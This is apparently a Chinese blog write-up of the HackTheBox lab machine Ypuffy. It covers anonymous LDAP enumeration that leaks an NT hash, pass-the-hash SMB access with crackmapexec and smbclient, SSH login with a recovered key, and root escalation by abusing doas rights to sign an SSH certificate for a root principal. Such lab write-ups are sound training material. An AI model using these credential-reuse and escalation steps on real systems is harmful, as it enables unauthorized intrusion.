【HTB系列】靶机Ypuffy的渗透测试详解

最新推荐文章于 2024-01-24 22:14:42 发布

大方子

最新推荐文章于 2024-01-24 22:14:42 发布

阅读量2.5k

点赞数 1

分类专栏： HTB靶场题解集合

本文链接：https://blog.csdn.net/nzjdsds/article/details/87192994

版权

HTB靶场题解集合专栏收录该内容

24 篇文章 42 订阅

订阅专栏

====================================================================

信息收集

我们用nmap对靶机进行信息收集

nmap -sV -sT -sC -T5 10.10.10.107

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 17:25 CST
Warning: 10.10.10.107 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.107
Host is up (0.29s latency).
Not shown: 940 closed ports, 55 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
|   256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp  open  http        OpenBSD httpd
| fingerprint-strings: 
|   DNSVersionBindReqTCP, RPCCheck: 
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:59 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
|     <title>400 Bad Request</title>
|     <style type="text/css"><!--
|     body { background-color: white; color: black; font-family: 'Comic Sans MS', 'Chalkboard SE', 'Comic Neue', sans-serif; }
|     border: 0; border-bottom: 1px dashed; }
|     --></style>
|     </head>
|     <body>
|     <h1>400 Bad Request</h1>
|     <hr>
|     <address>OpenBSD httpd</address>
|     </body>
|     </html>
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:55 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
|     <title>400 Bad Request</title>
|     <style type="text/css"><!--
|     body { background-color: white; color: black; font-family: 'Comic Sans MS', 'Chalkboard SE', 'Comic Neue', sans-serif; }
|     border: 0; border-bottom: 1px dashed; }
|     --></style>
|     </head>
|     <body>
|     <h1>400 Bad Request</h1>
|     <hr>
|     <address>OpenBSD httpd</address>
|     </body>
|_    </html>
|_http-server-header: OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)

通过报告我们知道

在端口22上运行ssh，在端口80上运行http，在端口139和445上运行smb，在端口389上运行ldap。

我们先看看80端口

好像出现了问题，那我们再看看SMB服务

看能不能进行匿名身份进行资源枚举

smbmap -H 10.10.10.107

提示认证失败

我们在换LDAP试试看，在namp的报告中提示，LDAP允许匿名访问

我们用ldapsearch工具老进行扫描

ldapsearch -h 10.10.10.107 -p 389 -x -b dc=hackthebox,dc=htb

-h：IP地址

-p：监听端口

-x：简单认证

-b：搜索的入口

# extended LDIF
#
# LDAPv3
# base <dc=hackthebox,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# hackthebox.htb
dn: dc=hackthebox,dc=htb
dc: hackthebox
objectClass: top
objectClass: domain

# passwd, hackthebox.htb
dn: ou=passwd,dc=hackthebox,dc=htb
ou: passwd
objectClass: top
objectClass: organizationalUnit

# bob8791, passwd, hackthebox.htb
dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
uid: bob8791
cn: Bob
objectClass: account
objectClass: posixAccount
objectClass: top
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==
uidNumber: 5001
gidNumber: 5001
gecos: Bob
homeDirectory: /home/bob8791
loginShell: /bin/ksh

# alice1978, passwd, hackthebox.htb
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
uid: alice1978
cn: Alice
objectClass: account
objectClass: posixAccount
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
gecos: Alice
homeDirectory: /home/alice1978
loginShell: /bin/ksh
sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
displayName: Alice
sambaAcctFlags: [U ]
sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
sambaPwdLastSet: 1532916644

# group, hackthebox.htb
dn: ou=group,dc=hackthebox,dc=htb
ou: group
objectClass: top
objectClass: organizationalUnit

# bob8791, group, hackthebox.htb
dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: bob8791
userPassword:: e2NyeXB0fSo=
gidNumber: 5001

# alice1978, group, hackthebox.htb
dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: alice1978
userPassword:: e2NyeXB0fSo=
gidNumber: 5000

# ypuffy, hackthebox.htb
dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
sambaDomainName: YPUFFY
sambaSID: S-1-5-21-3933741069-3307154301-3557023464
sambaAlgorithmicRidBase: 1000
objectclass: sambaDomain
sambaNextUserRid: 1000
sambaMinPwdLength: 5
sambaPwdHistoryLength: 0
sambaLogonToChgPwd: 0
sambaMaxPwdAge: -1
sambaMinPwdAge: 0
sambaLockoutDuration: 30
sambaLockoutObservationWindow: 30
sambaLockoutThreshold: 0
sambaForceLogoff: -1
sambaRefuseMachinePwdChange: 0
sambaNextRid: 1001

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8

我们也可以使用nmap来枚举ldap，并调用一个脚本 ldap-search

nmap -p 389 --script ldap-search 10.10.10.107

PORT STATE SERVICE
389/tcp open ldap
| ldap-search:
| Context: dc=hackthebox,dc=htb
| dn: dc=hackthebox,dc=htb
| dc: hackthebox
| objectClass: top
| objectClass: domain
| dn: ou=passwd,dc=hackthebox,dc=htb
| ou: passwd
| objectClass: top
| objectClass: organizationalUnit
| dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
| uid: bob8791
| cn: Bob
| objectClass: account
| objectClass: posixAccount
| objectClass: top
| userPassword: {BSDAUTH}bob8791
| uidNumber: 5001
| gidNumber: 5001
| gecos: Bob
| homeDirectory: /home/bob8791
| loginShell: /bin/ksh
| dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
| uid: alice1978
| cn: Alice
| objectClass: account
| objectClass: posixAccount
| objectClass: top
| objectClass: sambaSamAccount
| userPassword: {BSDAUTH}alice1978
| uidNumber: 5000
| gidNumber: 5000
| gecos: Alice
| homeDirectory: /home/alice1978
| loginShell: /bin/ksh
| sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
| displayName: Alice
| sambaAcctFlags: [U ]
| sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
| sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
| sambaPwdLastSet: 1532916644
| dn: ou=group,dc=hackthebox,dc=htb
| ou: group
| objectClass: top
| objectClass: organizationalUnit
| dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: bob8791
| userPassword: {crypt}*
| gidNumber: 5001
| dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: alice1978
| userPassword: {crypt}*
| gidNumber: 5000
| dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
| sambaDomainName: YPUFFY
| sambaSID: S-1-5-21-3933741069-3307154301-3557023464
| sambaAlgorithmicRidBase: 1000
| objectclass: sambaDomain
| sambaNextUserRid: 1000
| sambaMinPwdLength: 5
| sambaPwdHistoryLength: 0
| sambaLogonToChgPwd: 0
| sambaMaxPwdAge: -1
| sambaMinPwdAge: 0
| sambaLockoutDuration: 30
| sambaLockoutObservationWindow: 30
| sambaLockoutThreshold: 0
| sambaForceLogoff: -1
| sambaRefuseMachinePwdChange: 0
|_ sambaNextRid: 1001

Nmap done: 1 IP address (1 host up) scanned in 6.60 seconds

我们得到一个用户名alice1978和一个smb NT哈希 0B186E661BBDBDCF6047784DE8B9FD8B

此哈希是不可破解的，但我们仍然可以使用它来进行身份验证。

然后我们用我们得到的账号和密码进行SMB枚举

这里我们用crackmapexec

crackmapexec 10.10.10.107  -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B --shares

这里有2个共享一个是alice 可读可写另一个IPC$不允许访问

我们也可以用smbclient来枚举

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/

然后我们连接下alic

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/alice

只有一个文件叫my_private_key.ppk

get my_private_key.ppk下载它

ppk是putty远程登陆使用的文件后缀，我们需要进行转换

my_private_key.ppk 是一个putty私钥，我们需要将其转换为ssh私钥，以便能够与它进行ssh。

在kali，我们按照putty-tools

apt-get install putty-tools

然后我们将使用puttygen：

puttygen my_private_key.ppk -O private-openssh -o alice.key

然后

chmod 600 alice.key

最好进行连接

ssh -i alice.key alice1978@10.10.10.107

还记得http被重置吗，我们查看下/etc/httpd.conf

location "/userca*"

location "/sshauth*"

进行2次重定向

同时发现

另外的2个用户

在bob8971的家目录中存在一个sql文件

它创建一个名为的表principals和另一个名为的表keys

我们在检查下/etc/ssh/目录下的sshd_config文件

# $OpenBSD: sshd_config,v 1.102 2018/02/16 02:32:40 djm Exp $

# This is the sshd server system-wide configuration file. See # sshd_config(5) for more information.

# The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options override the # default value.

#Port 22 #AddressFamily any #ListenAddress 0.0.0.0 #ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key #HostKey /etc/ssh/ssh_host_ecdsa_key #HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying #RekeyLimit default none

# Logging #SyslogFacility AUTH #LogLevel INFO

# Authentication:

#LoginGraceTime 2m PermitRootLogin prohibit-password #StrictModes yes #MaxAuthTries 6 #MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2 # but this is overridden so installations will only check .ssh/authorized_keys AuthorizedKeysFile .ssh/authorized_keys

#AuthorizedPrincipalsFile none

AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u AuthorizedKeysCommandUser nobody

TrustedUserCAKeys /home/userca/ca.pub AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u AuthorizedPrincipalsCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts #HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # HostbasedAuthentication #IgnoreUserKnownHosts no # Don't read the user's ~/.rhosts and ~/.shosts files #IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here! PasswordAuthentication no #PermitEmptyPasswords no

# Change to no to disable s/key passwords ChallengeResponseAuthentication no

AllowAgentForwarding no AllowTcpForwarding no #GatewayPorts no X11Forwarding no #X11DisplayOffset 10 #X11UseLocalhost yes #PermitTTY yes #PrintMotd yes #PrintLastLog yes #TCPKeepAlive yes #UseLogin no #PermitUserEnvironment no #Compression delayed #ClientAliveInterval 0 #ClientAliveCountMax 3 #UseDNS no #PidFile /var/run/sshd.pid #MaxStartups 10:30:100 #PermitTunnel no #ChrootDirectory none #VersionAddendum none

# no default banner path #Banner none

# override default of no subsystems Subsystem sftp /usr/libexec/sftp-server

# Example of overriding settings on a per-user basis #Match User anoncvs # X11Forwarding no # AllowTcpForwarding no # PermitTTY no # ForceCommand cvs server

所以http服务负责一些ssh身份验证的东西，

我们用curl 请求下第一个

curl 'http://127.0.0.1/sshauth?type=keys&username=root'

没有任何返回

再试试第二个

curl 'http://127.0.0.1/sshauth?type=principals&username=root'

请求root的密钥给我们没有响应，但是请求我们得到的主体3m3rgencyB4ckd00r

生成和签署ssh密钥，获取root权限

所以现在我们有了root的主体3m3rgencyB4ckd00r。从理论上讲，我们可以生成ssh密钥并使用root的主体对它们进行签名，我们将能够以root身份与它们进行ssh。

问题是，因为alice1978我们没有被授权这样做。

在Linux上，我们可以检查是否可以运行提升的命令，sudo -l

但是这里没有

我们检查下doas

doas是BSD系列系统下的权限管理工具，类似于Debian系列下的sudo命令

这里我们看到alice1978可以不需要密码作为用户userca执行/usr/bin/ssh-keygen

第一步是为其创建ssh密钥

ssh-keygen -t rsa -f /tmp/id_rsa

然后我们需要证书（ca），我们到 /home/userca/

并签署我们刚刚创建的ssh密钥

-s证书

-I身份

-n主体

最后我们将以root身份ssh：

ssh -i /tmp/id_rsa root@localhost

大方子

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
5
评论
【HTB系列】靶机Ypuffy的渗透测试详解

====================================================================信息收集我们用nmap对靶机进行信息收集nmap -sV -sT -sC -T5 10.10.10.107Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 17:25 C...
复制链接

扫一扫